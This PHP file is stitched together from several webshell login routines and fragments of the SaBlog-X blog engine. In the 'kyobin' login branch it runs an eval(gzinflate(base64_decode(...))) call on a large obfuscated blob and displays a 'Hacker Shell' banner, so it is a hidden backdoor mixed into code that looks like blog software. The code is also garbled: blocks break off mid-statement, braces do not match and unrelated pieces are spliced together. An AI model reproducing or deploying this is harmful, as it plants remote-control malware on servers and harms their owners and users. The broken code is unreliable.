if ($charset == 'utf8') {
header("content-Type: text/html; charset=utf-8");
} elseif ($charset == 'latin1') {
header("content-Type: text/html; charset=iso-8859-1");
}
if ($haz == "logout") {
scookie('godssid', '', -86400 * 365);
p('<meta http-equiv="refresh" content="1;URL=' . $self . '">');
p('<a style="font:12px Verdana" href="' . $self . '">Success</a>');
exit;
}
if ($admin['check']) {
$password = md5($password);
if ($doing == 'login') {
if ($admin['pass'] == $password) {
scookie('godssid', $password);
p('<meta http-equiv="refresh" content="1;URL=' . $self . '">');
p('<a style="font:12px Verdana" href="' . $self . '">Success</a>');
exit;
}
}
if ($_COOKIE['godssid']) {
if ($_COOKIE['godssid'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
$errmsg = '';
if ($haz == 'phpinfo') {
} elseif ($charset == 'eucjpms') {
header("content-Type: text/html; charset=euc-jp");
}
$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();
/*===================== 身份验证 =====================*/
if ($action == "logout") {
scookie('loginpass', '', -86400 * 365);
p('<meta http-equiv="refresh" content="1;URL=' . $self . '">');
p('<a style="font:12px Verdana" href="' . $self . '">Success</a>');
exit;
}
if ($admin['check']) {
if ($doing == 'login') {
if ($admin['pass'] == md5($password)) {
scookie('loginpass', md5($password));
p('<meta http-equiv="refresh" content="1;URL=' . $self . '">');
p('<a style="font:12px Verdana" href="' . $self . '">Success</a>');
exit;
}
}
if ($_COOKIE['loginpass']) {
if ($_COOKIE['loginpass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== 验证结束 =====================*/
$errmsg = '';
header("content-Type: text/html; charset=euc-kr");
} elseif ($charset == 'euc-jp') {
header("content-Type: text/html; charset=euc-jp");
}
$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();
/*===================== 韬唤楠岃瘉 =====================*/
if ($action == "logout") {
scookie('loginpass', '', -86400 * 365);
@header('Location: ' . $self);
exit;
}
if ($pass) {
if ($action == 'login') {
if ($pass == encode_pass($password)) {
scookie('loginpass', encode_pass($password));
@header('Location: ' . $self);
exit;
}
}
if ($_COOKIE['loginpass']) {
if ($_COOKIE['loginpass'] != $pass) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== 楠岃瘉缁撴潫 =====================*/
$errmsg = '';
!$action && ($action = 'file');
} elseif ($charset == 'latin1') {
header("content-Type: text/html; charset=iso-8859-2");
}
$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();
/*===================== 身份验证 =====================*/
if ($action == "logout") {
scookie('phpspypass', '', -86400 * 365);
p('<meta http-equiv="refresh" content="1;URL=' . $self . '">');
p('<a style="font:12px Verdana" href="' . $self . '">Success</a>');
exit;
}
if ($admin['check']) {
if ($doing == 'login') {
if ($admin['pass'] == $password) {
scookie('phpspypass', $password);
p('<meta http-equiv="refresh" content="1;URL=' . $self . '">');
p('<a style="font:12px Verdana" href="' . $self . '">Success</a>');
exit;
}
}
if ($_COOKIE['phpspypass']) {
if ($_COOKIE['phpspypass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== 验证结束 =====================*/
$errmsg = '';
header("content-Type: text/html; charset=gbk");
} elseif ($charset == 'latin1') {
header("content-Type: text/html; charset=iso-8859-2");
}
$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();
if ($action == "logout") {
scookie('kyobin', '', -86400 * 365);
p('<meta http-equiv="refresh" content="0;URL=' . $self . '">');
p('<body background=black>');
exit;
}
if ($admin['check']) {
if ($doing == 'login') {
if ($admin['pass'] == $password) {
scookie('kyobin', $password);
//Passwd Bypass Read
eval(gzinflate(base64_decode('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')));
p('<meta http-equiv="refresh" content="2;URL=' . $self . '">');
p('<body bgcolor=black>
<BR><BR><div align=center><font color=yellow face=tahoma size=2>Hacker Shell - Yukleniyor..<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>');
exit;
} else {
$err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
echo $err_mess;
}
}
if ($_COOKIE['kyobin']) {
if ($_COOKIE['kyobin'] != $admin['pass']) {
loginpage();
}
${'p' . $i} = isset($P['p' . $i]) ? $P['p' . $i] : '';
}
if (isset($charsetdb[$charset])) {
header("content-Type: text/html; charset=" . $charset);
}
$timestamp = time();
/* 身份验证 */
if ($act == "logout") {
scookie('loginpass', '', -86400 * 365);
@header('Location: ' . SELF);
exit;
}
if ($pass) {
if ($act == 'login') {
if ($pass == encode_pass($P['password'])) {
scookie('loginpass', encode_pass($P['password']));
@header('Location: ' . SELF);
exit;
}
}
if (isset($_COOKIE['loginpass'])) {
if ($_COOKIE['loginpass'] != $pass) {
loginpage();
}
} else {
loginpage();
}
}
/* 验证结束 */
$errmsg = '';
$uchar = '▲';
$article['allowread'] = 0;
} else {
$article['allowread'] = 1;
if ($article['attachments']) {
$haveattach = 1;
}
if ($article['description']) {
$article['content'] = $article['description'];
}
}
$articledb[$article['articleid']] = $article;
}
unset($article);
$DB->free_result($query);
//设置一个时间戳,一定时间内该时间戳有效.用于COOKIE防盗链
scookie('viewarticle', $timestamp);
$metadb = array();
if ($aids) {
$query = $DB->query("SELECT m.mid, m.name, m.slug, m.type, r.cid FROM {$db_prefix}metas m\r\n\t\t\tINNER JOIN {$db_prefix}relationships r ON r.mid = m.mid\r\n\t\t\tWHERE m.type IN ('category', 'tag') AND r.cid IN ({$aids})\r\n\t\t\tORDER BY m.displayorder ASC, m.mid DESC");
while ($meta = $DB->fetch_array($query)) {
if ($meta['type'] == 'tag') {
$meta['url'] = gettaglink($meta['slug']);
$articledb[$meta['cid']]['content'] = highlight_tag($articledb[$meta['cid']]['content'], $meta['name']);
} else {
$meta['url'] = getcatelink($meta['mid'], $meta['slug']);
}
$metadb[$meta['cid']][$meta['type']][] = $meta;
}
unset($meta);
$DB->free_result($query);
if ($haveattach) {
}
$username = char_cv($username);
$r = $DB->fetch_one_array("SELECT userid FROM {$db_prefix}users WHERE username='******' LIMIT 1");
if ($r['userid']) {
redirect('该用户名已被注册.');
}
$email = char_cv($email);
$r = $DB->fetch_one_array("SELECT userid FROM {$db_prefix}users WHERE email='{$email}' LIMIT 1");
if ($r['userid']) {
redirect('该E-mail已被注册.');
}
$password = md5($password);
$DB->query("INSERT INTO {$db_prefix}users (username, password, logincount, loginip, logintime, email, url, regdateline, regip, groupid, lastip, lastvisit, lastactivity) VALUES ('{$username}', '{$password}', '1', '{$onlineip}', '{$timestamp}', '{$email}', '{$url}', '{$timestamp}', '{$onlineip}', '3', '{$onlineip}', '{$timestamp}', '{$timestamp}')");
$sax_uid = $DB->insert_id();
//保存COOKIE
scookie('sax_auth', authcode("{$sax_uid}\t{$password}\t1"), $login_life);
//更新数据库中的登陆会话
updatesession();
redirect('注册成功.', $options['url']);
}
//登陆状态检测
if (!$sax_uid || !$sax_pw || !$sax_logincount) {
loginpage();
} else {
$r = $DB->fetch_one_array("SELECT userid, password, logincount FROM {$db_prefix}users WHERE userid='{$sax_uid}'");
if (!$r) {
loginpage();
}
if ($sax_pw != $r['password']) {
loginpage();
}
message('该评论已存在');
}
$DB->query("INSERT INTO {$db_prefix}comments (comment_parent, articleid, author, email, url, dateline, content, ipaddress, visible) VALUES ('{$comment_parent}', '{$articleid}', '{$username}', '{$email}', '{$url}', '{$timestamp}', '{$content}', '{$onlineip}', '{$visible}')");
$cmid = $DB->insert_id();
if ($sax_uid) {
$DB->unbuffered_query("UPDATE {$db_prefix}users SET lastpost='{$timestamp}' WHERE userid='{$sax_uid}'");
// 更新用户最后发表时间
}
if (!$spam) {
// 如果不是垃圾则更新当前文章评论数
$DB->unbuffered_query("UPDATE {$db_prefix}articles SET comments=comments+1 WHERE articleid='{$articleid}'");
$DB->unbuffered_query("UPDATE {$db_prefix}statistics SET comment_count=comment_count+1");
newcomments_recache();
statistics_recache();
}
scookie('comment_post_time', $timestamp);
// 跳转到最新发表的评论
if ($comment_parent) {
$gocommentid = get_comment_parent($comment_parent);
} else {
$gocommentid = $cmid;
}
$cmnum = '#cm' . $gocommentid;
$article_comment_num = (int) $options['article_comment_num'];
if ($article_comment_num) {
$cpost = $DB->result($DB->query("SELECT COUNT(commentid) FROM {$db_prefix}comments WHERE articleid='{$articleid}' AND visible='1' AND commentid<='{$gocommentid}' AND comment_parent='0'"), 0);
if ($cpost / $article_comment_num <= 1) {
$page = 1;
} else {
$page = @ceil($cpost / $article_comment_num);
$article['url'] = redirect_permalink($articleid, $article['alias'], $page);
function dcookies($key = '')
{
global $sax_uid, $sax_user, $sax_pw;
if ($key) {
if (is_array($_COOKIE[$key])) {
foreach ($_COOKIE[$key] as $k => $name) {
scookie($key . '[' . $k . ']', '', -86400 * 365);
}
} else {
scookie($key, '', -86400 * 365);
}
} else {
if (is_array($_COOKIE)) {
foreach ($_COOKIE as $key => $val) {
scookie($key, '', -86400 * 365);
}
}
$sax_uid = 0;
$sax_user = $sax_pw = '';
}
}
">
<title>Refresh Limitation Enabled</title>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<div style="margin-top:100px;background-color:#f1f1f1;text-align:center;width:600px;padding:20px;margin-right: auto;margin-left: auto;font-family: Verdana, Tahoma; color: #666666; font-size: 12px">
<p><strong>Refresh Limitation Enabled</strong></p>
<p>The time between your two requests is smaller than 2 seconds, please do NOT refresh and wait for automatical forwarding ...</p>
</div>
</center>
</body>
</html>
<?php
exit;
}
scookie('lastrequest', $timestamp . "\t" . $REQUEST_URI);
}
if (($attackevasive == 2 || $attackevasive == 3) && ($_SERVER['HTTP_X_FORWARDED_FOR'] || $_SERVER['HTTP_VIA'] || $_SERVER['HTTP_PROXY_CONNECTION'] || $_SERVER['HTTP_USER_AGENT_VIA'])) {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Proxy Connection Denied</title>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<div style="margin-top:100px;background-color:#f1f1f1;text-align:center;width:600px;padding:20px;margin-right: auto;margin-left: auto;font-family: Verdana, Tahoma; color: #666666; font-size: 12px">
<p><strong>Proxy Connection Denied</strong></p>
<p>Your request was forbidden due to the administrator has set to deny all proxy connection.</p>
</div>
</center>
$query = $DB->query("SELECT m.mid, m.name, m.slug, m.type, r.cid FROM {$db_prefix}metas m\r\n\tINNER JOIN {$db_prefix}relationships r ON r.mid = m.mid\r\n\tWHERE m.type IN ('category', 'tag') AND r.cid='" . $article['articleid'] . "'\r\n\tORDER BY m.displayorder ASC, m.mid DESC");
$article['keywords'] = $comma = '';
while ($meta = $DB->fetch_array($query)) {
if ($meta['type'] == 'tag') {
$meta['url'] = gettaglink($meta['slug']);
$article['content'] = highlight_tag($article['content'], $meta['name']);
} else {
$meta['url'] = getcatelink($meta['mid'], $meta['slug']);
}
$article['keywords'] .= $comma . $meta['name'];
$metadb[$article['articleid']][$meta['type']][] = $meta;
$comma = ',';
}
$DB->free_result($query);
if ($_POST['readpassword'] && $article['readpassword'] == sax_addslashes($_POST['readpassword'])) {
scookie('readpassword_' . $article['articleid'], sax_addslashes($_POST['readpassword']), 2592000);
//一个月
}
//设置文章的分类名、作者、TAG、标题成为meta\title信息
if (!$article['keywords']) {
$tmp = $comma = '';
if (is_array($catecache) && count($catecache)) {
foreach ($catecache as $data) {
$tmp .= $comma . $data['name'];
$comma = ',';
}
$options['meta_keywords'] = $tmp;
} else {
$options['meta_keywords'] = '';
}
} else {
// 本文件说明:前台主程序
// --------------------------------------------------------------//
// 本程序作者:angel
// --------------------------------------------------------------//
// 本程序版本:SaBlog-X Ver 2.0
// --------------------------------------------------------------//
// 本程序主页:http://www.sablog.net
// ==============================================================//
require_once 'global.php';
//require_once(SABLOG_ROOT.'include/query.inc.php');
!$action && ($action = 'article');
//清除浏览文章记录
if ($_GET['action'] == 'clearalready') {
if (is_array($_COOKIE['articleids'])) {
foreach ($_COOKIE['articleids'] as $key => $value) {
scookie("articleids[" . $key . "]", '');
}
}
message('已经删除浏览过的文章记录', $referer);
}
$page = $maxpages && $page > $maxpages ? 1 : $page;
$moduledb = array('article', 'show', 'tagslist', 'archives', 'links');
if (in_array($action, $moduledb)) {
$archivenum = count($archivecache);
//前台显示12个归档就可以了.显示那么多干嘛?
if ($archivenum > 12) {
$archivecache = array_slice($archivecache, 0, 12);
}
$module = loadmodule($action);
} else {
message('未知模块');
